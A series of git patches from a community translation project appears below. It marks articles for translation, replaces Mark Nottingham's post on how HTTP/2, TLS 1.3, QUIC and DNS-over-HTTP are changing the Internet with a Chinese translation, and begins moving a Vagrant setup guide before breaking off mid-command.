0541/1627] translating --- sources/tech/20171208 OnionShare - Share Files Anonymously.md | 2 ++ sources/tech/20171208 The Biggest Problems With UC Browser.md | 2 ++ 2 files changed, 4 insertions(+) diff --git a/sources/tech/20171208 OnionShare - Share Files Anonymously.md b/sources/tech/20171208 OnionShare - Share Files Anonymously.md index bc42a009c5..473a0905ad 100644 --- a/sources/tech/20171208 OnionShare - Share Files Anonymously.md +++ b/sources/tech/20171208 OnionShare - Share Files Anonymously.md @@ -1,3 +1,5 @@ +translating---geekpi + OnionShare - Share Files Anonymously ====== In this Digital World, we share our media, documents, important files via the Internet using different cloud storage like Dropbox, Mega, Google Drive and many more. But every cloud storage comes with two major problems, one is the Size and the other Security. After getting used to Bit Torrent the size is not a matter anymore, but the security is. diff --git a/sources/tech/20171208 The Biggest Problems With UC Browser.md b/sources/tech/20171208 The Biggest Problems With UC Browser.md index 0a18d1b802..ef3fe62c3a 100644 --- a/sources/tech/20171208 The Biggest Problems With UC Browser.md +++ b/sources/tech/20171208 The Biggest Problems With UC Browser.md @@ -1,3 +1,5 @@ +translating---geekpi + The Biggest Problems With UC Browser ====== Before we even begin talking about the cons, I want to establish the fact that From 6a5948e4c1dd0ec01d6e90278a66eca9423cf45e Mon Sep 17 00:00:00 2001 From: geekpi Date: Thu, 14 Dec 2017 10:00:11 +0800 Subject: [PATCH 0542/1627] translating --- ... Cheat – A Collection Of Practical Linux Command Examples.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171207 Cheat – A Collection Of Practical Linux Command Examples.md b/sources/tech/20171207 Cheat – A Collection Of Practical Linux Command Examples.md index 3e82106ade..615de120d1 100644 --- a/sources/tech/20171207 Cheat – A Collection Of Practical Linux Command Examples.md +++ b/sources/tech/20171207 Cheat – A Collection Of Practical Linux Command Examples.md @@ -1,3 +1,5 @@ +translating---geekpi + Cheat – A Collection Of Practical Linux Command Examples ====== Many of us very often checks **[Man Pages][1]** to know about command switches From e676f42b13374fce69e2b987213bb458f6b72524 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Thu, 14 Dec 2017 15:43:05 +0800 Subject: [PATCH 0543/1627] Translated by qhwdw --- ...0171212 Internet protocols are changing.md | 178 ------------------ ...0171212 Internet protocols are changing.md | 178 ++++++++++++++++++ 2 files changed, 178 insertions(+), 178 deletions(-) delete mode 100644 sources/tech/20171212 Internet protocols are changing.md create mode 100644 translated/tech/20171212 Internet protocols are changing.md diff --git a/sources/tech/20171212 Internet protocols are changing.md b/sources/tech/20171212 Internet protocols are changing.md deleted file mode 100644 index 47550d3ca4..0000000000 --- a/sources/tech/20171212 Internet protocols are changing.md +++ /dev/null @@ -1,178 +0,0 @@ -Translating by qhwdw Internet protocols are changing -============================================================ - - -![](https://blog.apnic.net/wp-content/uploads/2017/12/evolution-555x202.png) - -When the Internet started to become widely used in the 1990s, most traffic used just a few protocols: IPv4 routed packets, TCP turned those packets into connections, SSL (later TLS) encrypted those connections, DNS named hosts to connect to, and HTTP was often the application protocol using it all. - -For many years, there were negligible changes to these core Internet protocols; HTTP added a few new headers and methods, TLS slowly went through minor revisions, TCP adapted congestion control, and DNS introduced features like DNSSEC. The protocols themselves looked about the same ‘on the wire’ for a very long time (excepting IPv6, which already gets its fair amount of attention in the network operator community.) - -As a result, network operators, vendors, and policymakers that want to understand (and sometimes, control) the Internet have adopted a number of practices based upon these protocols’ wire ‘footprint’ — whether intended to debug issues, improve quality of service, or impose policy. - -Now, significant changes to the core Internet protocols are underway. While they are intended to be compatible with the Internet at large (since they won’t get adoption otherwise), they might be disruptive to those who have taken liberties with undocumented aspects of protocols or made an assumption that things won’t change. - -#### Why we need to change the Internet - -There are a number of factors driving these changes. - -First, the limits of the core Internet protocols have become apparent, especially regarding performance. Because of structural problems in the application and transport protocols, the network was not being used as efficiently as it could be, leading to end-user perceived performance (in particular, latency). - -This translates into a strong motivation to evolve or replace those protocols because there is a [large body of experience showing the impact of even small performance gains][14]. - -Second, the ability to evolve Internet protocols — at any layer — has become more difficult over time, largely thanks to the unintended uses by networks discussed above. For example, HTTP proxies that tried to compress responses made it more difficult to deploy new compression techniques; TCP optimization in middleboxes made it more difficult to deploy improvements to TCP. - -Finally, [we are in the midst of a shift towards more use of encryption on the Internet][15], first spurred by Edward Snowden’s revelations in 2015\. That’s really a separate discussion, but it is relevant here in that encryption is one of best tools we have to ensure that protocols can evolve. - -Let’s have a look at what’s happened, what’s coming next, how it might impact networks, and how networks impact protocol design. - -#### HTTP/2 - -[HTTP/2][16] (based on Google’s SPDY) was the first notable change — standardized in 2015, it multiplexes multiple requests onto one TCP connection, thereby avoiding the need to queue requests on the client without blocking each other. It is now widely deployed, and supported by all major browsers and web servers. - -From a network’s viewpoint, HTTP/2 made a few notable changes. First, it’s a binary protocol, so any device that assumes it’s HTTP/1.1 is going to break. - -That breakage was one of the primary reasons for another big change in HTTP/2; it effectively requires encryption. This gives it a better chance of avoiding interference from intermediaries that assume it’s HTTP/1.1, or do more subtle things like strip headers or block new protocol extensions — both things that had been seen by some of the engineers working on the protocol, causing significant support problems for them. - -[HTTP/2 also requires TLS/1.2 to be used when it is encrypted][17], and [blacklists ][18]cipher suites that were judged to be insecure — with the effect of only allowing ephemeral keys. See the TLS 1.3 section for potential impacts here. - -Finally, HTTP/2 allows more than one host’s requests to be [coalesced onto a connection][19], to improve performance by reducing the number of connections (and thereby, congestion control contexts) used for a page load. - -For example, you could have a connection for www.example.com, but also use it for requests for images.example.com. [Future protocol extensions might also allow additional hosts to be added to the connection][20], even if they weren’t listed in the original TLS certificate used for it. As a result, assuming that the traffic on a connection is limited to the purpose it was initiated for isn’t going to apply. - -Despite these changes, it’s worth noting that HTTP/2 doesn’t appear to suffer from significant interoperability problems or interference from networks. - -#### TLS 1.3 - -[TLS 1.3][21] is just going through the final processes of standardization and is already supported by some implementations. - -Don’t be fooled by its incremental name; this is effectively a new version of TLS, with a much-revamped handshake that allows application data to flow from the start (often called ‘0RTT’). The new design relies upon ephemeral key exchange, thereby ruling out static keys. - -This has caused concern from some network operators and vendors — in particular those who need visibility into what’s happening inside those connections. - -For example, consider the datacentre for a bank that has regulatory requirements for visibility. By sniffing traffic in the network and decrypting it with the static keys of their servers, they can log legitimate traffic and identify harmful traffic, whether it be attackers from the outside or employees trying to leak data from the inside. - -TLS 1.3 doesn’t support that particular technique for intercepting traffic, since it’s also [a form of attack that ephemeral keys protect against][22]. However, since they have regulatory requirements to both use modern encryption protocols and to monitor their networks, this puts those network operators in an awkward spot. - -There’s been much debate about whether regulations require static keys, whether alternative approaches could be just as effective, and whether weakening security for the entire Internet for the benefit of relatively few networks is the right solution. Indeed, it’s still possible to decrypt traffic in TLS 1.3, but you need access to the ephemeral keys to do so, and by design, they aren’t long-lived. - -At this point it doesn’t look like TLS 1.3 will change to accommodate these networks, but there are rumblings about creating another protocol that allows a third party to observe what’s going on— and perhaps more — for these use cases. Whether that gets traction remains to be seen. - -#### QUIC - -During work on HTTP/2, it became evident that TCP has similar inefficiencies. Because TCP is an in-order delivery protocol, the loss of one packet can prevent those in the buffers behind it from being delivered to the application. For a multiplexed protocol, this can make a big difference in performance. - -[QUIC][23] is an attempt to address that by effectively rebuilding TCP semantics (along with some of HTTP/2’s stream model) on top of UDP. Like HTTP/2, it started as a Google effort and is now in the IETF, with an initial use case of HTTP-over-UDP and a goal of becoming a standard in late 2018\. However, since Google has already deployed QUIC in the Chrome browser and on its sites, it already accounts for more than 7% of Internet traffic. - -Read [Your questions answered about QUIC][24] - -Besides the shift from TCP to UDP for such a sizable amount of traffic (and all of the adjustments in networks that might imply), both Google QUIC (gQUIC) and IETF QUIC (iQUIC) require encryption to operate at all; there is no unencrypted QUIC. - -iQUIC uses TLS 1.3 to establish keys for a session and then uses them to encrypt each packet. However, since it’s UDP-based, a lot of the session information and metadata that’s exposed in TCP gets encrypted in QUIC. - -In fact, iQUIC’s current [‘short header’][25] — used for all packets except the handshake — only exposes a packet number, an optional connection identifier, and a byte of state for things like the encryption key rotation schedule and the packet type (which might end up encrypted as well). - -Everything else is encrypted — including ACKs, to raise the bar for [traffic analysis][26] attacks. - -However, this means that passively estimating RTT and packet loss by observing connections is no longer possible; there isn’t enough information. This lack of observability has caused a significant amount of concern by some in the operator community, who say that passive measurements like this are critical for debugging and understanding their networks. - -One proposal to meet this need is the ‘[Spin Bit][27]‘ — a bit in the header that flips once a round trip, so that observers can estimate RTT. Since it’s decoupled from the application’s state, it doesn’t appear to leak any information about the endpoints, beyond a rough estimate of location on the network. - -#### DOH - -The newest change on the horizon is DOH — [DNS over HTTP][28]. A [significant amount of research has shown that networks commonly use DNS as a means of imposing policy][29] (whether on behalf of the network operator or a greater authority). - -Circumventing this kind of control with encryption has been [discussed for a while][30], but it has a disadvantage (at least from some standpoints) — it is possible to discriminate it from other traffic; for example, by using its port number to block access. - -DOH addresses that by piggybacking DNS traffic onto an existing HTTP connection, thereby removing any discriminators. A network that wishes to block access to that DNS resolver can only do so by blocking access to the website as well. - -For example, if Google was to deploy its [public DNS service over DOH][31]on www.google.com and a user configures their browser to use it, a network that wants (or is required) to stop it would have to effectively block all of Google (thanks to how they host their services). - -DOH has just started its work, but there’s already a fair amount of interest in it, and some rumblings of deployment. How the networks (and governments) that use DNS to impose policy will react remains to be seen. - -Read [IETF 100, Singapore: DNS over HTTP (DOH!)][1] - -#### Ossification and grease - -To return to motivations, one theme throughout this work is how protocol designers are increasingly encountering problems where networks make assumptions about traffic. - -For example, TLS 1.3 has had a number of last-minute issues with middleboxes that assume it’s an older version of the protocol. gQUIC blacklists several networks that throttle UDP traffic, because they think that it’s harmful or low-priority traffic. - -When a protocol can’t evolve because deployments ‘freeze’ its extensibility points, we say it has  _ossified_ . TCP itself is a severe example of ossification; so many middleboxes do so many things to TCP — whether it’s blocking packets with TCP options that aren’t recognized, or ‘optimizing’ congestion control. - -It’s necessary to prevent ossification, to ensure that protocols can evolve to meet the needs of the Internet in the future; otherwise, it would be a ‘tragedy of the commons’ where the actions of some individual networks — although well-intended — would affect the health of the Internet overall. - -There are many ways to prevent ossification; if the data in question is encrypted, it cannot be accessed by any party but those that hold the keys, preventing interference. If an extension point is unencrypted but commonly used in a way that would break applications visibly (for example, HTTP headers), it’s less likely to be interfered with. - -Where protocol designers can’t use encryption and an extension point isn’t used often, artificially exercising the extension point can help; we call this  _greasing_  it. - -For example, QUIC encourages endpoints to use a range of decoy values in its [version negotiation][32], to avoid implementations assuming that it will never change (as was often encountered in TLS implementations, leading to significant problems). - -#### The network and the user - -Beyond the desire to avoid ossification, these changes also reflect the evolving relationship between networks and their users. While for a long time people assumed that networks were always benevolent — or at least disinterested — parties, this is no longer the case, thanks not only to [pervasive monitoring][33] but also attacks like [Firesheep][34]. - -As a result, there is growing tension between the needs of Internet users overall and those of the networks who want to have access to some amount of the data flowing over them. Particularly affected will be networks that want to impose policy upon those users; for example, enterprise networks. - -In some cases, they might be able to meet their goals by installing software (or a CA certificate, or a browser extension) on their users’ machines. However, this isn’t as easy in cases where the network doesn’t own or have access to the computer; for example, BYOD has become common, and IoT devices seldom have the appropriate control interfaces. - -As a result, a lot of discussion surrounding protocol development in the IETF is touching on the sometimes competing needs of enterprises and other ‘leaf’ networks and the good of the Internet overall. - -#### Get involved - -For the Internet to work well in the long run, it needs to provide value to end users, avoid ossification, and allow networks to operate. The changes taking place now need to meet all three goals, but we need more input from network operators. - -If these changes affect your network — or won’t— please leave comments below, or better yet, get involved in the [IETF][35] by attending a meeting, joining a mailing list, or providing feedback on a draft. - -Thanks to Martin Thomson and Brian Trammell for their review. - - _Mark Nottingham is a member of the Internet Architecture Board and co-chairs the IETF’s HTTP and QUIC Working Groups._ - --------------------------------------------------------------------------------- - -via: https://blog.apnic.net/2017/12/12/internet-protocols-changing/ - -作者:[ Mark Nottingham ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://blog.apnic.net/author/mark-nottingham/ -[1]:https://blog.apnic.net/2017/11/17/ietf-100-singapore-dns-http-doh/ -[2]:https://blog.apnic.net/author/mark-nottingham/ -[3]:https://blog.apnic.net/category/tech-matters/ -[4]:https://blog.apnic.net/tag/dns/ -[5]:https://blog.apnic.net/tag/doh/ -[6]:https://blog.apnic.net/tag/guest-post/ -[7]:https://blog.apnic.net/tag/http/ -[8]:https://blog.apnic.net/tag/ietf/ -[9]:https://blog.apnic.net/tag/quic/ -[10]:https://blog.apnic.net/tag/tls/ -[11]:https://blog.apnic.net/tag/protocol/ -[12]:https://blog.apnic.net/2017/12/12/internet-protocols-changing/#comments -[13]:https://blog.apnic.net/ -[14]:https://www.smashingmagazine.com/2015/09/why-performance-matters-the-perception-of-time/ -[15]:https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/46197.pdf -[16]:https://http2.github.io/ -[17]:http://httpwg.org/specs/rfc7540.html#TLSUsage -[18]:http://httpwg.org/specs/rfc7540.html#BadCipherSuites -[19]:http://httpwg.org/specs/rfc7540.html#reuse -[20]:https://tools.ietf.org/html/draft-bishop-httpbis-http2-additional-certs -[21]:https://datatracker.ietf.org/doc/draft-ietf-tls-tls13/ -[22]:https://en.wikipedia.org/wiki/Forward_secrecy -[23]:https://quicwg.github.io/ -[24]:https://blog.apnic.net/2016/08/30/questions-answered-quic/ -[25]:https://quicwg.github.io/base-drafts/draft-ietf-quic-transport.html#short-header -[26]:https://www.mjkranch.com/docs/CODASPY17_Kranch_Reed_IdentifyingHTTPSNetflix.pdf -[27]:https://tools.ietf.org/html/draft-trammell-quic-spin -[28]:https://datatracker.ietf.org/wg/doh/about/ -[29]:https://datatracker.ietf.org/meeting/99/materials/slides-99-maprg-fingerprint-based-detection-of-dns-hijacks-using-ripe-atlas/ -[30]:https://datatracker.ietf.org/wg/dprive/about/ -[31]:https://developers.google.com/speed/public-dns/ -[32]:https://quicwg.github.io/base-drafts/draft-ietf-quic-transport.html#rfc.section.3.7 -[33]:https://tools.ietf.org/html/rfc7258 -[34]:http://codebutler.com/firesheep -[35]:https://www.ietf.org/ - - diff --git a/translated/tech/20171212 Internet protocols are changing.md b/translated/tech/20171212 Internet protocols are changing.md new file mode 100644 index 0000000000..afbc568ed9 --- /dev/null +++ b/translated/tech/20171212 Internet protocols are changing.md @@ -0,0 +1,178 @@ +因特网协议正在发生变化 +============================================================ + + +![](https://blog.apnic.net/wp-content/uploads/2017/12/evolution-555x202.png) + +在上世纪九十年代,当因特网开始被广泛使用的时候,大部分的通讯只使用几个协议:IPv4 路由包,TCP 转发这些包到连接上,SSL(后来的 TLS)加密连接,DNS 命名连接上的主机,HTTP 是最常用的应用程序协议。 + +多年以来,这些核心的因特网协议的变化几乎是可以忽略的;HTTP 增加了几个新的报文头和方法,TLS 缓慢地进行了一点小修改,TCP 调整了拥塞控制,而 DNS 引入了像 DNSSEC 这样的特性。这些协议本身在很长一段时间以来都面向相同的 “线上(on the wire)” 环境(除了 IPv6,它已经引起网络运营商们的大量关注)。 + +因此,网络运营商、供应商、和政策制定者们,他们想去了解(并且有时是想去管理),因特网基于上面的这些协议的“影响(footpring)”已经采纳了的大量的实践 — 是否打算去调试问题、改善服务质量、或者强制实施策略。 + +现在,核心因特网协议的重要改变已经开始了。虽然它们的目的是与因特网兼容(因为,如果不兼容的话,它们不会被采纳),但是它们可以破坏那些在协议方面进行非法使用的人的自由,或者假设那些事件不会改变。 + +#### 为什么我们需要去改变因特网 + +那里有大量的因素推动这些变化。 + +首先,核心因特网协议的限制越来越明显,尤其是考虑到性能的时候。由于在应用程序和传输协议方面的结构上的问题,网络不能被高效地使用,导致终端用户感受到性能问题(特别是,延迟)。 + +这就转化成进化或者替换这些协议的强烈的动机,因为有 [大量的经验表明,即便是很小的性能改善也会产生影响][14]。 + +第二,有能力去进化因特网协议 — 在任何层面上 — 随着时间的推移会变得更加困难,很大程度上要感谢上面所讨论的网络带来的意想不到的使用。例如,尝试去压缩响应的 HTTP 代理,使的部署一个新的压缩技术更困难;中间设备中的 TCP 优化使得部署一个对 TCP 的改善越来越困难。 + +最后,[我们正处在一个更多地使用加密技术的因特网变化中][15],首次激起这种改变的事件是,2015 的 Edward Snowden 披露的信息(译者注:指的是美国中情局雇员斯诺登的事件)。那是一个单独讨论的话题,但是它的意义是,我们为确保协议可以进化,加密是其中一个很好的工具。 + +让我们来看一下都发生了什么,接下来会出现什么,它对网络有哪些影响,和它对网络协议的设计有哪些影响。 + +#### HTTP/2 + +[HTTP/2][16](基于 Google 的 SPDY) 是第一个发生重大变化的 — 在 2015 年被标准化,它多路传输多个请求到一个 TCP 连接中,因此可以在客户端上不阻塞任何一个其它请求的情况下避免了请求队列。它现在已经被广泛部署,并且被所有的主流浏览器和 web 服务器支持。 + +从一个网络的角度来看,HTTP/2 的一些显著变化。首先,适合一个二进制协议,因此,任何假定它是 HTTP/1.1 的设备都会被中断。 + +中断是在 HTTP/2 中另一个大的变化的主要原因;它有效地请求加密。这种改变的好处是避免了来自伪装的 HTTP/1.1 的中间人攻击,或者一些更狡滑的比如 “脱衣攻击” 或者阻止新的协议扩展 — 协议上的这两种情况都在工程师的工作中出现过,给他们带来了很明显的支持问题。 + +[当它被加密时,HTTP/2 也请求使用 TLS/1.2][17],并且 [黑名单][18] 密码组合已经被证明不安全 — 它只对暂时的密钥有效果。关于潜在的影响可以去看 TLS 1.3 的相关章节。 + +最终,HTTP/2 允许多于一个主机的请求去被 [合并到一个连接上][19],通过减少页面加载所使用的连接(和拥塞管理上下文)数量去提升性能。 + +例如,你可以为 www.example.com 有一个连接,也可以用这个连接去为 images.example.com 的请求所使用。[未来协议的扩展也可以允许另外的主机去被添加到连接][20],即便它们没有在最初的 TLS 证书中被列为可以使用。因此,假设连接上的通讯被限制了用途,那么在这种情况下它就不能被使用了。 + +值得注意的是,尽管存在这些变化,HTTP/2 并没有出现明显的互操作性问题或者来自网络的冲突。 + +#### TLS 1.3 + +[TLS 1.3][21] 仅通过了标准化的最后过程,并且已经被一些实现所支持。 + +不要被它只增加了版本号的名字所欺骗;它实际上是一个新的 TLS 版本,修改了很多 “握手”,它允许应用程序数据去从开始流出(经常被称为 ‘0RTT’)。新的设计依赖短暂的密钥交换,因此,排除了静态密钥。 + +这引起了一些网络运营商和供应商的担心 — 尤其是那些需要清晰地知道那些连接中发生了什么的人。 + +例如,假设一个对可视性有监管要求的银行数据中心,通过在网络中嗅探通讯包并且使用他们的服务器上的静态密钥解密它,它们可以记录合法通讯和识别有害通讯,是否是一个来自外部的攻击,或者员工从内部去泄露数据。 + +TLS 1.3 并不支持那些窃听通讯的特定技术,因此,它也可以 [以短暂的密钥来防范一种形式的攻击][22]。然而,因为他们有监管要求去使用更现代化的加密协议并且去监视他们的网络,这些使网络运营商处境很尴尬。 + +关于是否规定要求静态密钥、替代方式是否有效、并且为了相对较少的网络环境而减弱整个因特网的安全是否是一个正确的解决方案有很多的争论。确实,仍然有可能对使用 TLS 1.3 的通讯进行解密,但是,你需要去访问一个短暂的密钥才能做到,并且,按照设计,它们不可能长时间存在。 + +在这一点上,TLS 1.3 似乎不会去改变来适应这些网络,但是,关于去创建另外的协议去允许第三方去偷窥通讯内容 — 或者做更多的事情 — 对于这种使用情况,网络上到处充斥着不满的声音。 + +#### QUIC + +在 HTTP/2 工作期间,可以很明显地看到 TCP 是很低效率的。因为 TCP 是一个按顺序发送的协议,丢失的包阻止了在缓存中的后面等待的包被发送到应用程序。对于一个多路协议来说,这对性能有很大的影响。 + +[QUIC][23] 是尝试去解决这种影响而在 UDP 之上重构的 TCP 语义(属于 HTTP/2 的流模型的一部分)像 HTTP/2 一样,它作为 Google 的一项成果被发起,并且现在已经进入了 IETF,它最初是作为一个 HTTP-over-UDP 的使用案例,并且它的目标是在 2018 年成为一个标准。但是,因为 Google 在 Chrome 浏览器和它的网站上中已经部署了 QUIC,它已经占有了因特网通讯超过 7% 的份额。 + +阅读 [关于 QUIC 的答疑][24] + +除了大量的通讯(以及隐含的可能的网络调整)从 TCP 到 UDP 的转变之外,Google QUIC(gQUIC)和 IETF QUIC(iQUIC)都要求完全加密;这里没有非加密的 QUIC。 + +iQUIC 使用 TLS 1.3 去为一个会话创建一个密码,然后使用它去加密每个包。然而,因为,它是基于 UDP 的,在 QUIC 中许多会话信息和元数据在加密后的 TCP 包中被公开。 + +事实上,iQUIC 当前的 [‘短报文头’][25] — 被用于除了握手外的所有包 — 仅公开一个包编号、一个可选的连接标识符、和一个状态字节,像加密密钥转换计划和包字节(它最终也可能被加密)。 + +其它的所有东西都被加密 — 包括 ACKs,以提高 [通讯分析][26] 攻击的门槛。 + +然而,这意味着被动估算 RTT 和通过观察连接的丢失包将不再变得可能;因为这里没有足够多的信息了。在一些运营商中,由于缺乏可观测性,导致了大量的担忧,它们认为像这样的被动测量对于他们调试和了解它们的网络是至关重要的。 + +为满足这一需求,它们有一个提议是 ‘[Spin Bit][27]‘ — 在报文头中的一个 bit,它是一个往返的开关,因此,可能通过观察它来估算 RTT。因为,它从应用程序的状态中解耦的,它的出现并不会泄露关于终端的任何信息,也无法实现对网络位置的粗略估计。 + +#### DOH + +可以肯定的即将发生的变化是 DOH — [DNS over HTTP][28]。[大量的研究表明,对网络实施策略的一个常用手段是通过 DNS 实现的][29](是否代表网络运营商或者一个更大的权威)。 + +使用加密去规避这种控制已经 [讨论了一段时间了][30],但是,它有一个不利条件(至少从某些立场来看)— 它可能从其它的通讯中被区别对待;例如,通过利用它的端口号被阻止访问。 + +DOH 将 DNS 通讯稍带在已经建立的 HTTP 连接上,因此,消除了任何的鉴别器。一个网络希望去阻止访问,仅需要去阻止 DNS 解析就可以做到阻止对特定网站的访问。 + +例如,如果 Google 在 www.google.com 上部署了它的 [基于 DOH 的公共 DNS 服务][31] 并且一个用户配置了它的浏览器去使用它,一个希望(或被要求的)被停止的网络,它将被 Google 有效的全部阻止(向他们提供的服务致敬!)。 + +DOH 才刚刚开始,但它已经引起很多人的兴趣和一些部署的声音。通过使用 DNS 来实施策略的网络(和政府机构)如何反应还有待观察。 + +阅读 [IETF 100, Singapore: DNS over HTTP (DOH!)][1] + +#### 骨化和润滑 + +让我们返回到协议变化的动机,其中一个主题是吞吐量,协议设计者们遇到的越来越多的问题是怎么去假设关于通讯的问题。 + +例如,TLS 1.3 有一个使用旧版本协议的中间设备的最后结束时间的问题。gQUIC 黑名单控制网络的 UDP 通讯,因为,它们认为那是有害的或者是低优先级的通讯。 + +当一个协议因为已部署而 “冻结” 它的可扩展点导致不能被进化,我们称它为 _已骨化_ 。TCP 协议自身就是一个严重骨化的例子,因此,很中间设备在 TCP 上做了很多的事情 — 是否阻止有无法识别的 TCP 选项的数据包,或者,优化拥塞控制。 + +有必要去阻止骨化,去确保协议可以被进化,以满足未来因特网的需要;否则,它将成为一个 ”公共的悲剧“,它只能是满足一些个别的网络行为的地方 — 虽然很好 — 但是将影响整个因特网的健康发展。 + +这里有很多的方式去阻止骨化;如果被讨论的数据是加密的,它并不能被任何一方所访问,但是持有密钥的人,阻止了干扰。如果扩展点是未加密的,但是在一种可以打破应用程序可见性(例如,HTTP 报头)的方法被常规使用后,它不太可能会受到干扰。 + +协议设计者不能使用加密的地方和一个不经常使用的扩展点、人为发挥的可利用的扩展点;我们称之为 _润滑_ 它。 + +例如,QUIC 鼓励终端在 [版本协商][32] 中使用一系列的诱饵值,去避免它永远不变化的假定实现(就像在 TLS 实现中经常遇到的导致重大问题的情况)。 + +#### 网络和用户 + +除了避免骨化的愿望外,这些变化也反映出了网络和它们的用户之间的进化。很长时间以来,人们总是假设网络总是很仁慈好善的 — 或者至少是公正的 — 这种情况是不存在的,不仅是 [无孔不入的监视][33],也有像 [Firesheep][34] 的攻击。 + +因此,因特网用户的整体需求和那些想去访问流经它们的网络的用户数据的网络之间的关系日益紧张。尤其受影响的是那些希望去对它们的用户实施策略的网络;例如,企业网络。 + +在一些情况中,他们可以通过在它们的用户机器上安装软件(或一个 CA 证书,或者一个浏览器扩展)来达到他们的目的。然而,在网络不是所有者或者能够访问计算机的情况下,这并不容易;例如,BYOD 已经很常用,并且物联网设备几乎没有合适的控制接口。 + +因此,在 IETF 中围绕协议开发的许多讨论,是去接触企业和其它的 ”叶子“ 网络之间偶尔的需求竞争,并且这对因特网的整体是有好处的。 + +#### 参与 + +为了让因特网在以后工作的更好,它需要为终端用户提供价值、避免骨化、并且允许网络去控制。现在发生的变化需要去满足所有的三个目标,但是,我们需要网络运营商更多的投入。 + +如果这些变化影响你的网络 — 或者没有影响 — 请在下面留下评论,或者更好用了,通过参加会议、加入邮件列表、或者对草案提供反馈来参与 [IETF][35] 的工作。 + +感谢 Martin Thomson 和 Brian Trammell 的评论。 + + _Mark Nottingham 是因特网架构委员会的成员和 IETF 的 HTTP 和 QUIC 工作组的共同主持人。_ + +-------------------------------------------------------------------------------- + +via: https://blog.apnic.net/2017/12/12/internet-protocols-changing/ + +作者:[Mark Nottingham][a] +译者:[qhwdw](https://github.com/qhwdw) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://blog.apnic.net/author/mark-nottingham/ +[1]:https://blog.apnic.net/2017/11/17/ietf-100-singapore-dns-http-doh/ +[2]:https://blog.apnic.net/author/mark-nottingham/ +[3]:https://blog.apnic.net/category/tech-matters/ +[4]:https://blog.apnic.net/tag/dns/ +[5]:https://blog.apnic.net/tag/doh/ +[6]:https://blog.apnic.net/tag/guest-post/ +[7]:https://blog.apnic.net/tag/http/ +[8]:https://blog.apnic.net/tag/ietf/ +[9]:https://blog.apnic.net/tag/quic/ +[10]:https://blog.apnic.net/tag/tls/ +[11]:https://blog.apnic.net/tag/protocol/ +[12]:https://blog.apnic.net/2017/12/12/internet-protocols-changing/#comments +[13]:https://blog.apnic.net/ +[14]:https://www.smashingmagazine.com/2015/09/why-performance-matters-the-perception-of-time/ +[15]:https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/46197.pdf +[16]:https://http2.github.io/ +[17]:http://httpwg.org/specs/rfc7540.html#TLSUsage +[18]:http://httpwg.org/specs/rfc7540.html#BadCipherSuites +[19]:http://httpwg.org/specs/rfc7540.html#reuse +[20]:https://tools.ietf.org/html/draft-bishop-httpbis-http2-additional-certs +[21]:https://datatracker.ietf.org/doc/draft-ietf-tls-tls13/ +[22]:https://en.wikipedia.org/wiki/Forward_secrecy +[23]:https://quicwg.github.io/ +[24]:https://blog.apnic.net/2016/08/30/questions-answered-quic/ +[25]:https://quicwg.github.io/base-drafts/draft-ietf-quic-transport.html#short-header +[26]:https://www.mjkranch.com/docs/CODASPY17_Kranch_Reed_IdentifyingHTTPSNetflix.pdf +[27]:https://tools.ietf.org/html/draft-trammell-quic-spin +[28]:https://datatracker.ietf.org/wg/doh/about/ +[29]:https://datatracker.ietf.org/meeting/99/materials/slides-99-maprg-fingerprint-based-detection-of-dns-hijacks-using-ripe-atlas/ +[30]:https://datatracker.ietf.org/wg/dprive/about/ +[31]:https://developers.google.com/speed/public-dns/ +[32]:https://quicwg.github.io/base-drafts/draft-ietf-quic-transport.html#rfc.section.3.7 +[33]:https://tools.ietf.org/html/rfc7258 +[34]:http://codebutler.com/firesheep +[35]:https://www.ietf.org/ + + From f74c8cd976989b17952e0f94ce8fdba1e045e962 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 14 Dec 2017 15:50:24 +0800 Subject: [PATCH 0544/1627] =?UTF-8?q?update=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2014=E6=97=A5=20=E6=98=9F=E6=9C=9F=E5=9B=9B=2015:50:2?= =?UTF-8?q?4=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... creating Vagrant boxes with VirtualBox.md | 129 ------------------ ... creating Vagrant boxes with VirtualBox.md | 122 +++++++++++++++++ 2 files changed, 122 insertions(+), 129 deletions(-) delete mode 100644 sources/tech/20171010 Complete guide for creating Vagrant boxes with VirtualBox.md create mode 100644 translated/tech/20171010 Complete guide for creating Vagrant boxes with VirtualBox.md diff --git a/sources/tech/20171010 Complete guide for creating Vagrant boxes with VirtualBox.md b/sources/tech/20171010 Complete guide for creating Vagrant boxes with VirtualBox.md deleted file mode 100644 index a91f8b25a8..0000000000 --- a/sources/tech/20171010 Complete guide for creating Vagrant boxes with VirtualBox.md +++ /dev/null @@ -1,129 +0,0 @@ -translating by lujun9972 -Complete guide for creating Vagrant boxes with VirtualBox -====== -Vagrant is tool for building & managing virtual machines environment, especially development environments. It provides easy to use & easy to replicate/reproducible environment built on top of technologies like Docker, VirtualBox, Hyper-V, Vmware , AWS etc. - -Vagrant Boxes simplifies software configuration part & completely resolves the 'it works on my machine' problem that is usually faced in software development projects. Vagrant, thus increases the development productivity. - -In this tutorial, we will learn to setup Vagrant Boxes on our Linux machines using the VirtualBox. - -### Pre-requisites - --Vagrant runs on top of a virtualization environment, & we will be using VritualBox for that. We already have a detailed article on "[ **Installing VirtualBox on Linux**][1]", read the article to setup VirtualBox on system. - -Once VirtualBox has been installed, we can move forward with Vagrant setup process. - - **(Recommended Read :[Create your first Docker Container ][2])** - -### Installation - -Once the VirtualBox is up & running on the machine, we will install the latest vagrant package. At the time of writing this tutorial, the latest version of Vagrant is 2.0.0. So download the latest rpm for vagrant using, - - **$ wget https://releases.hashicorp.com/vagrant/2.0.0/vagrant_2.0.0_x86_64.rpm** - -& install the package using , - - **$ sudo yum install vagrant_2.0.0_x86_64.rpm** - -If using Ubuntu, download the latest vagrant package using the following command, - - **$ wget 